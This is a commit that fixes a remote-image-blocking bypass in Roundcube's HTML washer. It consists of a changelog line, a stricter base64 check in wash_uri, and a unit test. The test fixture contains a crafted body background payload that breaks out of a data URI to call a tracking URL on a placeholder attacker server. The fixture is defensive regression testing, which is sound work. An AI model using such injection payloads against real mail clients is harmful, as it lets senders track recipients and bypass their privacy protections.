Fix remote image blocking bypass via a crafted body background attribute

Reported by nullcathedral

Author: alecpl

CHANGELOG.md

@@ -13,6 +13,7 @@ This file includes only changes we consider noteworthy for users, admins and plu
 - Security: Fix bug where a password could get changed without providing the old password
 - Security: Fix IMAP Injection + CSRF bypass in mail search
 - Security: Fix remote image blocking bypass via various SVG animate attributes
+- Security: Fix remote image blocking bypass via a crafted body background attribute
 
 ## 1.7-rc4
 

program/lib/Roundcube/rcube_washtml.php

@@ -416,6 +416,11 @@ private function wash_uri($uri, $blocked_source = false, $is_image = true)
                 return 'data:image/' . $type . ',' . base64_encode($svg);
             }
 
+            // At this point we allow only valid base64 images
+            if (stripos($type, 'base64') === false || preg_match('|[^0-9a-z\s/+]|i', $matches[2])) {
+                return '';
+            }
+
             return $uri;
         }
 

tests/Framework/WashtmlTest.php

@@ -271,6 +271,13 @@ public function test_style_body_attrs()
         $this->assertMatchesRegularExpression('|link="#111"|', $washed, 'Body link attribute');
         $this->assertMatchesRegularExpression('|alink="#222"|', $washed, 'Body alink attribute');
         $this->assertMatchesRegularExpression('|vlink="#333"|', $washed, 'Body vlink attribute');
+
+        $html = '<html><body background="data:image/png,x);background:url(//ATTACKER_SERVER/track?uid=test"></body></html>';
+
+        $washer = new \rcube_washtml(['html_elements' => ['body']]);
+        $washed = $washer->wash($html);
+
+        $this->assertMatchesRegularExpression('|x-washed="background"|', $washed, 'Body evil background');
     }
 
     /**